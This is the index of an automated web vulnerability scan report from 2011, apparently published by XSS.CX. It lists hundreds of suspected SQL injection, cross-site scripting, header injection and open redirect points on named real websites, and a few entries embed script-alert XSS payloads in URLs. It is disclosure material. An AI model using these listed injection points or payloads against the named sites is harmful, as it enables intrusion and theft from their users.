CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Fri Apr 01 09:37:54 CDT 2011.

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. SQL injection

1.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

1.2. http://learn.shavlik.com/shavlik/index.cfm [m parameter]

1.3. http://order.1and1.com/xml/jasmin/get/110325-1413/frontend-stopper-main+info-footnote+qx-lightbox+swfobject+!qx-backbutton+!hosting-en+!econda-tracking+suffix/js-min/AC:default [REST URL parameter 4]

1.4. http://order.1and1.com/xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default [Referer HTTP header]

1.5. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 2]

1.6. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 3]

1.7. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 4]

1.8. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 5]

1.9. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 6]

1.10. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [catId parameter]

1.11. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]

1.12. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

1.13. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]

1.14. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]

1.15. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]

1.16. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]

1.17. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

1.18. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

1.19. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

1.20. http://www.nutter.com/careers.php [CareerID parameter]

1.21. http://www.nutter.com/careers.php [CategoryID parameter]

1.22. http://www.soundingsonline.com/archives/'+NSFTW+' [REST URL parameter 2]

1.23. http://www.soundingsonline.com/archives/'+NSFTW+' [name of an arbitrarily supplied request parameter]

1.24. http://www.soundingsonline.com/archives/'+NSFTW+' [ordering parameter]

1.25. http://www.soundingsonline.com/archives/'+NSFTW+' [searchphrase parameter]

1.26. https://www.supermedia.com/help/direct-mail [trafficSource cookie]

1.27. http://www.vcahospitals.com/tools/markers_sema.php [name of an arbitrarily supplied request parameter]

1.28. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]

2. LDAP injection

3. Cross-site scripting (stored)

3.1. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

3.2. http://order.1and1.com/xml/order/Home [REST URL parameter 3]

4. HTTP header injection

4.1. http://ad.doubleclick.net/ad/huffpost.boomerangpixel/bingmodule [REST URL parameter 1]

4.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [REST URL parameter 1]

4.3. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [REST URL parameter 1]

4.4. http://ad.doubleclick.net/adi/huffpost.politics/news [REST URL parameter 1]

4.5. http://ad.doubleclick.net/adj/N6036.AOL/B5125476.4 [REST URL parameter 1]

4.6. http://ad.doubleclick.net/adj/huffpost.politics/longpost [REST URL parameter 1]

4.7. http://ad.doubleclick.net/adj/huffpost.politics/news [REST URL parameter 1]

4.8. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]

4.9. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

4.10. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

5. Cross-site scripting (reflected)

5.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [adurl parameter]

5.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [ai parameter]

5.3. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [client parameter]

5.4. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]

5.5. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sig parameter]

5.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [sz parameter]

5.7. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [adurl parameter]

5.8. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [ai parameter]

5.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [client parameter]

5.10. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [num parameter]

5.11. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sig parameter]

5.12. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sz parameter]

5.13. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

5.14. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]

5.15. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

5.16. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]

5.17. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

5.18. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_uuid parameter]

5.19. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

5.20. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [redirect parameter]

5.21. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

5.22. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [sz parameter]

5.23. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_adid parameter]

5.24. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_id parameter]

5.25. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [mt_uuid parameter]

5.26. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [redirect parameter]

5.27. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43 [sz parameter]

5.28. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

5.29. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

5.30. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

5.31. http://api.bing.com/qsonhs.aspx [q parameter]

5.32. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PGTP parameter]

5.33. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PUBID parameter]

5.34. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [RDRID parameter]

5.35. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SBTYPE parameter]

5.36. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SOURCE parameter]

5.37. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [jt parameter]

5.38. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]

5.39. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]

5.40. http://i1.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.41. http://i3.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.42. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [name of an arbitrarily supplied request parameter]

5.43. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

5.44. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

5.45. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

5.46. http://learn.shavlik.com/shavlik/index.cfm [h parameter]

5.47. http://my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]

5.48. http://my-happyfeet.com/cart.asp [rp parameter]

5.49. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

5.50. http://pglb.buzzfed.com/10032/5d8526ab7c4243a9a90f4ea3af7d7ab9 [callback parameter]

5.51. https://secure.avangate.com/order/cart.php [CART_ID parameter]

5.52. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter]

5.53. https://secure.avangate.com/order/checkout.php [CART_ID parameter]

5.54. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter]

5.55. https://secure.shareit.com/shareit/checkout.html [prno parameter]

5.56. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

5.57. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

5.58. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

5.59. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

5.60. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

5.61. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

5.62. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

5.63. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

5.64. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

5.65. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

5.66. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

5.67. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

5.68. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

5.69. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]

5.70. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 1]

5.71. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

5.72. http://www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

5.73. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.74. http://www.citysbest.com/traffic/ [REST URL parameter 1]

5.75. http://www.fast-report.com/bitrix/redirect.php [goto parameter]

5.76. http://www.fast-report.com/bitrix/redirect2.php [goto parameter]

5.77. http://www.fast-report.com/bitrix/redirect2.php [name of an arbitrarily supplied request parameter]

5.78. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

5.79. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

5.80. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

5.81. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

5.82. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]

5.83. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]

5.84. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]

5.85. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]

5.86. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]

5.87. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

5.88. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

5.89. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

5.90. http://www.manitu.de/shop/ [account_id parameter]

5.91. http://www.manitu.de/shop/ [billc_birthdate parameter]

5.92. http://www.manitu.de/shop/ [billc_city parameter]

5.93. http://www.manitu.de/shop/ [billc_email parameter]

5.94. http://www.manitu.de/shop/ [billc_fax parameter]

5.95. http://www.manitu.de/shop/ [billc_firstname parameter]

5.96. http://www.manitu.de/shop/ [billc_lastname parameter]

5.97. http://www.manitu.de/shop/ [billc_organization parameter]

5.98. http://www.manitu.de/shop/ [billc_phone parameter]

5.99. http://www.manitu.de/shop/ [billc_street1 parameter]

5.100. http://www.manitu.de/shop/ [billc_street2 parameter]

5.101. http://www.manitu.de/shop/ [billc_title parameter]

5.102. http://www.manitu.de/shop/ [billc_zipcode parameter]

5.103. http://www.my-happyfeet.com/cart.asp [mode parameter]

5.104. http://www.my-happyfeet.com/cart.asp [name of an arbitrarily supplied request parameter]

5.105. http://www.my-happyfeet.com/cart.asp [refurl parameter]

5.106. http://www.nutter.com/careers.php [CareerID parameter]

5.107. http://www.nutter.com/careers.php [CategoryID parameter]

5.108. http://www.paperg.com/jsfb/embed.php [bid parameter]

5.109. https://www.supermedia.com/spportal/spportalFlow.do [_flowId parameter]

5.110. http://www.superpages.com/inc/social/soc.php [cg parameter]

5.111. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 1]

5.112. https://www.territoryahead.com/account/login/loginmain%20.jsp [REST URL parameter 2]

5.113. https://www.territoryahead.com/account/login/loginmain%20.jsp [name of an arbitrarily supplied request parameter]

5.114. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 1]

5.115. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 2]

5.116. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 1]

5.117. https://www.territoryahead.com/account/orderhistory/orderstatus.jsp [REST URL parameter 2]

5.118. https://www.territoryahead.com/jump.jsp ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000045)%3C/script%3E parameter]

5.119. https://www.territoryahead.com/jump.jsp [itemID parameter]

5.120. https://www.territoryahead.com/jump.jsp [name of an arbitrarily supplied request parameter]

5.121. https://www.territoryahead.com/jump.jsp [path parameter]

5.122. https://www2.hbc.com/contactus/contact-us.asp [langid parameter]

5.123. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

5.124. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

5.125. https://www.supermedia.com/spportal/404.jsp [Referer HTTP header]

5.126. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

5.127. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

5.128. https://www.supermedia.com/spportal/spportalFlow.do [Referer HTTP header]

5.129. https://www.territoryahead.com/account/login/loginmain%20.jsp [Referer HTTP header]

5.130. https://www.territoryahead.com/account/login/loginmain%20.jsp [User-Agent HTTP header]

5.131. https://www.territoryahead.com/jump.jsp [Referer HTTP header]

5.132. https://www.territoryahead.com/jump.jsp [User-Agent HTTP header]

5.133. http://portal.smartertools.com/ST.ashx [siteuidut cookie]

5.134. http://www.aol.com/ [dlact cookie]

5.135. https://www.territoryahead.com/account/login/loginmain%20.jsp [CoreID6 cookie]

5.136. https://www.territoryahead.com/account/login/loginmain%20.jsp [PS_ALL cookie]

5.137. https://www.territoryahead.com/account/login/loginmain%20.jsp [customer cookie]

5.138. https://www.territoryahead.com/account/login/loginmain%20.jsp [mmlID cookie]

5.139. https://www.territoryahead.com/account/login/loginmain%20.jsp [order cookie]

5.140. https://www.territoryahead.com/jump.jsp [90232094_clogin cookie]

5.141. https://www.territoryahead.com/jump.jsp [CoreID6 cookie]

5.142. https://www.territoryahead.com/jump.jsp [JSESSIONID cookie]

5.143. https://www.territoryahead.com/jump.jsp [PS_ALL cookie]

5.144. https://www.territoryahead.com/jump.jsp [cmTPSet cookie]

5.145. https://www.territoryahead.com/jump.jsp [customer cookie]

5.146. https://www.territoryahead.com/jump.jsp [mmlID cookie]

5.147. https://www.territoryahead.com/jump.jsp [order cookie]

5.148. https://www.territoryahead.com/jump.jsp [s_cc cookie]

5.149. https://www.territoryahead.com/jump.jsp [s_sq cookie]

6. Flash cross-domain policy

6.1. http://ad.doubleclick.net/crossdomain.xml

6.2. http://aka-cdn-ns.adtechus.com/crossdomain.xml

6.3. http://api.search.live.net/crossdomain.xml

6.4. http://at.atwola.com/crossdomain.xml

6.5. http://b.scorecardresearch.com/crossdomain.xml

6.6. http://dominionenterprises.112.2o7.net/crossdomain.xml

6.7. http://imagec17.247realmedia.com/crossdomain.xml

6.8. http://learn.shavlik.com/crossdomain.xml

6.9. http://log30.doubleverify.com/crossdomain.xml

6.10. http://o.sa.aol.com/crossdomain.xml

6.11. http://oasc05139.247realmedia.com/crossdomain.xml

6.12. http://pixel.quantserve.com/crossdomain.xml

6.13. http://s0.2mdn.net/crossdomain.xml

6.14. http://secure-us.imrworldwide.com/crossdomain.xml

6.15. http://segment-pixel.invitemedia.com/crossdomain.xml

6.16. http://wsjrs2.s3.amazonaws.com/crossdomain.xml

6.17. http://www.econda-monitor.de/crossdomain.xml

6.18. http://www.huffingtonpost.com/crossdomain.xml

6.19. http://ads.tw.adsonar.com/crossdomain.xml

6.20. http://api.tweetmeme.com/crossdomain.xml

6.21. http://googleads.g.doubleclick.net/crossdomain.xml

6.22. http://js.adsonar.com/crossdomain.xml

6.23. http://music.aol.com/crossdomain.xml

6.24. http://my.screenname.aol.com/crossdomain.xml

6.25. http://o.aolcdn.com/crossdomain.xml

6.26. http://pagead2.googlesyndication.com/crossdomain.xml

6.27. http://static.ak.fbcdn.net/crossdomain.xml

6.28. http://www.aol.com/crossdomain.xml

6.29. http://www.blogsmithmedia.com/crossdomain.xml

6.30. http://www.citysbest.com/crossdomain.xml

6.31. https://www.godaddy.com/crossdomain.xml

6.32. http://www.paperg.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://api.search.live.net/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://dominionenterprises.112.2o7.net/clientaccesspolicy.xml

7.5. http://o.aolcdn.com/clientaccesspolicy.xml

7.6. http://o.sa.aol.com/clientaccesspolicy.xml

7.7. http://s0.2mdn.net/clientaccesspolicy.xml

7.8. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.9. http://www.aol.com/clientaccesspolicy.xml

7.10. http://ts1.mm.bing.net/clientaccesspolicy.xml

7.11. http://ts2.mm.bing.net/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://forums.smartertools.com/login.aspx

8.2. http://www.fast-report.com/en/buy/

8.3. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

8.4. http://www.fast-report.com/en/download/fastreport.net-download.html

8.5. http://www.fast-report.com/en/download/fastreport.net-download.html/

8.6. http://www.fast-report.com/en/products/

8.7. http://www.fast-report.com/en/products/FastReport.Net.html

9. XML injection

9.1. http://use.typekit.com/k/lvr1wgh-b.css [REST URL parameter 1]

9.2. http://use.typekit.com/k/lvr1wgh-b.css [REST URL parameter 2]

10. SQL statement in request parameter

10.1. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

10.2. http://www.bluestarfibres.com/page.php

10.3. http://www.insideup.com/ppc/leadflow/hins00/project.php

10.4. http://www.nutter.com/careers.php

10.5. https://www.supermedia.com/spportal/spportalFlow.do

10.6. https://www.territoryahead.com/jump.jsp

11. SSL cookie without secure flag set

11.1. https://www.territoryahead.com/jump.jsp

11.2. https://feedback.discoverbing.com/default.aspx

11.3. https://www.godaddy.com/

11.4. https://www.godaddy.com/Hosting/web-hosting.aspx

11.5. https://www.godaddy.com/catalog.aspx

11.6. https://www.godaddy.com/domains/search.aspx

11.7. https://www.godaddy.com/gdshop/hosting/landing.asp

11.8. https://www.godaddy.com/hosting/website-builder.aspx

11.9. https://www.supermedia.com/spportal/spportalFlow.do

12. Session token in URL

12.1. http://a1.bing4.com/fd/fb/simls

12.2. http://order.1and1.com/xml/order

12.3. http://order.1and1.com/xml/order/CloudDynamicServer

12.4. http://order.1and1.com/xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3

12.5. http://order.1and1.com/xml/order/Contact

12.6. http://order.1and1.com/xml/order/DomaininfoMove

12.7. http://order.1and1.com/xml/order/Eshops

12.8. http://order.1and1.com/xml/order/Home

12.9. http://order.1and1.com/xml/order/Home

12.10. http://order.1and1.com/xml/order/Hosting

12.11. http://order.1and1.com/xml/order/Instant

12.12. http://order.1and1.com/xml/order/Jumpto

12.13. http://order.1and1.com/xml/order/LocalSubmission

12.14. http://order.1and1.com/xml/order/Mail

12.15. http://order.1and1.com/xml/order/MailInstantMail

12.16. http://order.1and1.com/xml/order/MailXchange

12.17. http://order.1and1.com/xml/order/MicrosoftExchange

12.18. http://order.1and1.com/xml/order/MsHosting

12.19. http://order.1and1.com/xml/order/Server

12.20. http://order.1and1.com/xml/order/ServerPremium

12.21. http://order.1and1.com/xml/order/Sharepoint

12.22. http://order.1and1.com/xml/order/VirtualServer

12.23. http://order.1and1.com/xml/order/sitedesign

12.24. http://pub2.camera.trafficland.com/image/live.jpg

12.25. http://sales.liveperson.net/hc/18987408/

12.26. https://secure.shareit.com/shareit/checkout.html

12.27. https://secure.shareit.com/shareit/checkout.html

12.28. http://www.facebook.com/extern/login_status.php

13. Open redirection

13.1. http://b.scorecardresearch.com/r [d.c parameter]

13.2. http://www.global-bd.net/ [name of an arbitrarily supplied request parameter]

14. Cookie scoped to parent domain

14.1. http://api.twitter.com/1/statuses/user_timeline.json

14.2. http://c.microsoft.com/trans_pixel.aspx

14.3. https://www.plimus.com/jsp/buynow.jsp

14.4. http://a1.bing4.com/fd/fb/simls

14.5. http://api.flickr.com/clientaccesspolicy.xml

14.6. http://b.aol.com/vanity/

14.7. http://b.scorecardresearch.com/b

14.8. http://b.scorecardresearch.com/p

14.9. http://b.scorecardresearch.com/r

14.10. http://c.bing.com/c.gif

14.11. http://c.microsoft.com/trans_pixel.asp

14.12. http://explore.live.com/Handlers/Plt.mvc

14.13. http://id.google.com/verify/EAAAAI8sWLg3-CQ8dVKhlM8XS4A.gif

14.14. http://leadback.advertising.com/adcedge/lb

14.15. http://pixel.mathtag.com/creative/img

14.16. http://pixel.quantserve.com/pixel

14.17. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

14.18. http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif

14.19. http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js

14.20. http://safebrowsing.clients.google.com/safebrowsing/downloads

14.21. http://safebrowsing.clients.google.com/safebrowsing/gethash

14.22. http://tacoda.at.atwola.com/rtx/r.js

14.23. http://tags.bluekai.com/site/3200

14.24. http://tracker.marinsm.com/tp

14.25. https://www.godaddy.com/

14.26. https://www.godaddy.com/Hosting/web-hosting.aspx

14.27. https://www.godaddy.com/catalog.aspx

14.28. https://www.godaddy.com/domains/search.aspx

14.29. https://www.godaddy.com/gdshop/hosting/landing.asp

14.30. https://www.godaddy.com/hosting/website-builder.aspx

14.31. http://www.microsofttranslator.com/Ajax/V2/Widget.aspx

15. Cookie without HttpOnly flag set

15.1. http://c.microsoft.com/trans_pixel.aspx

15.2. http://hbc.com/

15.3. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

15.4. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp

15.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

15.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/

15.7. http://www.aol.com/ajax.jsp

15.8. http://www.bizfind.us/ricerca.asp

15.9. http://www.cramerdev.com/

15.10. http://www.hbccards.com/

15.11. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php

15.12. http://www.microsofttranslator.com/Ajax/V2/Widget.aspx

15.13. http://www.paperg.com/jsfb/embed.php

15.14. https://www.plimus.com/jsp/buynow.jsp

15.15. https://www.supermedia.com/spportal/spportalFlow.do

15.16. https://www.territoryahead.com/jump.jsp

15.17. http://www.vcahospitals.com/favicon.ico

15.18. https://www2.hbc.com/contactus/contact-us.asp

15.19. http://a1.bing4.com/fd/fb/simls

15.20. http://ad.yieldmanager.com/pixel

15.21. http://ad.yieldmanager.com/unpixel

15.22. http://advertising.microsoft.com/search-advertising

15.23. http://api.flickr.com/clientaccesspolicy.xml

15.24. http://b.aol.com/vanity/

15.25. http://b.scorecardresearch.com/b

15.26. http://b.scorecardresearch.com/p

15.27. http://b.scorecardresearch.com/r

15.28. http://bing.com//us/dc/washington/restaurantsb8e13'-alert(1)-'2806c252a89/

15.29. http://bing.com/maps

15.30. http://blog.smartertools.com/Themes/Blogs/leanandgreen/style/DynamicStyle.aspx

15.31. http://blog.smartertools.com/archive/2011/02/23/from-sea-to-shining-sea-smartertools-committed-to-serving-its-international-customers.aspx

15.32. http://blog.smartertools.com/archive/2011/03/23/lessons-learned-from-gdc-2011.aspx

15.33. http://blog.smartertools.com/themes/leanandgreen/style/DynamicStyle.aspx

15.34. http://blogs.msdn.com/Themes/MSDN2/Images/MSDN/bg_body_MSDN.png

15.35. http://blogs.msdn.com/Utility/FooterFragments/Core/UserInfoPopup.js

15.36. http://blogs.msdn.com/b/sharepoint_workspace_development_team/

15.37. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/contentpane.png

15.38. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/layout-background.png

15.39. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/logo_msdn.png

15.40. http://blogs.msdn.com/themes/MSDN2/Images/MSDN/search2.png

15.41. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-info.gif

15.42. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-rss.gif

15.43. http://blogs.msdn.com/themes/MSDN2/Images/Weblogs/icon-thumbnail-list.gif

15.44. http://blogs.msdn.com/themes/MSDN2/Images/icon-sprite.gif

15.45. http://blogs.msdn.com/themes/MSDN2/Images/pager-item.png

15.46. http://blogs.msdn.com/themes/MSDN2/css/DynamicStyle.aspx

15.47. http://blogs.msdn.com/themes/MSDN2/css/base.css

15.48. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-core.css

15.49. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-forums.css

15.50. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-groups.css

15.51. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-mediagalleries.css

15.52. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-messages.css

15.53. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-weblogs.css

15.54. http://blogs.msdn.com/themes/MSDN2/css/content-fragments-wikis.css

15.55. http://blogs.msdn.com/themes/MSDN2/css/content-fragments.css

15.56. http://blogs.msdn.com/themes/MSDN2/css/footer-fragments.css

15.57. http://blogs.msdn.com/themes/MSDN2/css/header-fragments.css

15.58. http://blogs.msdn.com/themes/MSDN2/css/print.css

15.59. http://blogs.msdn.com/themes/MSDN2/css/screen.css

15.60. http://blogs.msdn.com/themes/MSDN2/favicon.ico

15.61. http://blogs.msdn.com/themes/blogs/MSDN2/css/DynamicStyle.aspx

15.62. http://blogs.msdn.com/themes/blogs/MSDN2/css/MSDNblogs.css

15.63. http://blogs.msdn.com/themes/generic/css/layout.css

15.64. http://blogs.msdn.com/themes/generic/css/layout.css

15.65. http://blogs.msdn.com/themes/msdn2/css/msdn.css

15.66. http://blogs.msdn.com/themes/msdn2/images/MSDN/widget-right.png

15.67. http://blogs.msdn.com/themes/msdn2/images/msdn/widget-left.png

15.68. http://blogs.msdn.com/utility/jquery/jquery-1.3.2.min.js

15.69. http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js

15.70. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/blogmarks.gif

15.71. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/delicious.gif

15.72. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/digg.gif

15.73. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/diigo.gif

15.74. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/facebook.gif

15.75. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/fark.gif

15.76. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/faves.gif

15.77. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/friendfeed.gif

15.78. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/google.gif

15.79. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/less.gif

15.80. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/linkedin.gif

15.81. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/livefavorites.gif

15.82. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/mixx.gif

15.83. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/more.gif

15.84. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/myspace.gif

15.85. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/newsvine.gif

15.86. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/reddit.gif

15.87. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/slashdot.gif

15.88. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/stumbleupon.gif

15.89. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/technorati.gif

15.90. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/twitter.gif

15.91. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/resources/ShareThis.js

15.92. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/resources/sharethis.css

15.93. http://blogs.technet.com/Utility/FooterFragments/Core/UserInfoPopup.js

15.94. http://blogs.technet.com/analyticsid.aspx

